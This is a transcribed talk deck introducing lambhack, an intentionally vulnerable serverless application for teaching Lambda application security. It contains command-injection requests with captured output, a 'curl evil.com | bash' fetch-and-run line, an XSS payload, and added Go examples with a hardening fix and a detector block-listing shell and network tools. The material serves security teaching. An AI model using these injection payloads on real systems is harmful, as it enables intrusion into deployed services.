lambhack: a vulnerable serverless application
CLOUD AUSTIN @WICKETT
LAMBHACK: A VULNERABLE SERVERLESS APPLICATION
JAMES WICKETT
Development of highly resilient, distributed systems is now easier than ever with serverless; however, application security is more important than ever before.
WHY IT MATTERS
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ AUTHOR OF DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
Serverless encourages functions as the deploy unit, run as one-time*, read-only containers*, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
SERVERLESS DEFINITION
* - there is container reuse and writability
[Chart: waste vs. value across Hardware, VMs and Serverless; inspiration from @adrianco]
http://martinfowler.com/articles/serverless.html
API GATEWAY
‣ CI/CD
‣ AUTH
‣ WORDPRESS SCRAPER
‣ EVENT INGESTION
‣ CHATBOTS
‣ LOAD TESTING
MORE SERVERLESS USE CASES
Security
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
INSPIRED BY WEB GOAT AND ALL THE OTHER GOATS…
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
lambhack is a vulnerable serverless lambda application. It would certainly be a bad idea to base any coding patterns off what you see here.
WHY IS THIS BAD?
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
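The two lines above hand a raw query-string value to a command runner. The following is an added example, not lambhack's own code: it places that pattern (assuming runner.Run shells out) beside a hardened handler that allowlists the command, validates each argument, and executes the argv directly with no shell, so metacharacters are never interpreted. The allowlist contents are an assumption for the example.

```go
package main

import (
	"errors"
	"os/exec"
	"regexp"
	"strings"
)

// Commands the endpoint is permitted to run; the set is an assumption for this example.
var allowedCommands = map[string]bool{"uname": true, "date": true}

// Each argument must be one token of safe characters; ';', '|', '&', '$', quotes and
// whitespace cannot pass this, so "uname -a; sleep 1" is rejected at "-a;".
var safeArg = regexp.MustCompile(`^[A-Za-z0-9._-]+$`)

var ErrRejected = errors.New("command rejected by allowlist")

// vulnerableRun reproduces the lambhack pattern: the raw ?args= value goes to a shell,
// so a chained "cmd; cmd2" runs both. (That runner.Run is a shell-out is an assumption.)
func vulnerableRun(args string) (string, error) {
	out, err := exec.Command("sh", "-c", args).CombinedOutput()
	return string(out), err
}

// validateCommand splits the query value into an argv and rejects anything that is not an
// allowlisted command with simple arguments. Returning argv rather than a string is what
// lets hardenedRun skip the shell entirely.
func validateCommand(args string) ([]string, error) {
	fields := strings.Fields(args)
	if len(fields) == 0 || !allowedCommands[fields[0]] {
		return nil, ErrRejected
	}
	for _, f := range fields[1:] {
		if !safeArg.MatchString(f) {
			return nil, ErrRejected
		}
	}
	return fields, nil
}

// hardenedRun executes the validated argv directly (no "sh -c"), so even if the
// validation were loosened later, metacharacters would still be passed as literal bytes.
func hardenedRun(args string) (string, error) {
	argv, err := validateCommand(args)
	if err != nil {
		return "", err
	}
	out, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return string(out), err
}
```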
With command execution available to us in lambhack, we can poke around the container a bit.
UNAME -A
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
CAT /PROC/VERSION
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
LET’S LOOK IN /TMP
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
> total 17916
> drwx------  2 sbx_user1056 490     4096 Feb 8 22:02 .
> drwxr-xr-x 21 root         root    4096 Feb 8 21:47 ..
> -rwxrwxr-x  1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
LAMBDA REUSE IN ACTION!
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
WHICH CURL
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
GOT PROXY?
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1"
> "<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 50px;\n background-color: #fff;\n border-radius: 1em;\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n body {\n background-color: #fff;\n }\n div {\n width: auto;\n margin: 0 auto;\n border-radius: 0;\n padding: 1em;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is established to be used for illustrative examples in documents. You may use this\n domain in examples without prior coordination or asking for permission.</p>\n <p><a href=\"http://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\n"
bit.ly/lh-demo1
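Every request in the demo above leaves a trace in the API Gateway access log, and the ?args= values are exactly what a detection rule should look at. The following is an added example, not part of the talk or of lambhack: it inspects constructed access-log lines (the JSON layout with requestId and queryString fields is an assumption about how the access log was configured) and flags args values that contain shell metacharacters or start with a shell or network tool. The raw query string is parsed by hand because Go's url.ParseQuery rejects ';' since Go 1.17, which would hide the very character of interest.

```go
package main

import (
	"encoding/json"
	"net/url"
	"regexp"
	"strings"
)

// Constructed sample lines; the JSON shape (requestId, queryString) is an assumed access-log format.
var sampleLines = []string{
	`{"requestId":"c1","queryString":"args=uname+-a%3B+sleep+1"}`,
	`{"requestId":"c2","queryString":"args=curl+https://www.example.com"}`,
	`{"requestId":"c3","queryString":"page=2"}`,
}

// Characters that only make sense if the parameter is being handed to a shell.
var shellMeta = regexp.MustCompile("[;|&`$<>]")
// Binaries that should never be the first word of a query parameter on this API.
var shellTools = map[string]bool{"curl": true, "wget": true, "nc": true, "sh": true, "bash": true}

// argsParam pulls the ?args= value out of the raw query string. url.ParseQuery is avoided
// because since Go 1.17 it returns an error on ';', the exact character we want to inspect.
func argsParam(query string) (string, error) {
	for _, kv := range strings.Split(query, "&") {
		if strings.HasPrefix(kv, "args=") {
			return url.QueryUnescape(strings.TrimPrefix(kv, "args="))
		}
	}
	return "", nil
}

// Inspect parses one log line and reports whether its args parameter looks like a command chain.
func Inspect(line string) (bool, string, error) {
	var rec map[string]string
	if err := json.Unmarshal([]byte(line), &rec); err != nil {
		return false, "", err
	}
	args, err := argsParam(rec["queryString"])
	if err != nil {
		return false, "", err
	}
	if shellMeta.MatchString(args) {
		return true, rec["requestId"] + ": shell metacharacter in args=" + args, nil
	}
	if f := strings.Fields(args); len(f) > 0 && shellTools[f[0]] {
		return true, rec["requestId"] + ": shell/network tool in args=" + f[0], nil
	}
	return false, "", nil
}
```

Run Inspect over each entry of sampleLines: c1 and c2 are flagged, c3 is not.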
‣ HELP NEEDED
‣ ADD XSS AND OTHER ATTACKS
‣ ADD AUTH VECTORS AND EXAMPLES
‣ NEEDS A UI PLEASE!
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
APPLICATION SECURITY IS STILL RELEVANT 15+ YEARS LATER
‣ New surface area, similar appsec problems
‣ Command Exec, XSS, Injection Attacks
‣ All the OWASP Top Ten
‣ What is old is new.
‣ Appending 'curl evil.com | bash'
‣ Add <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]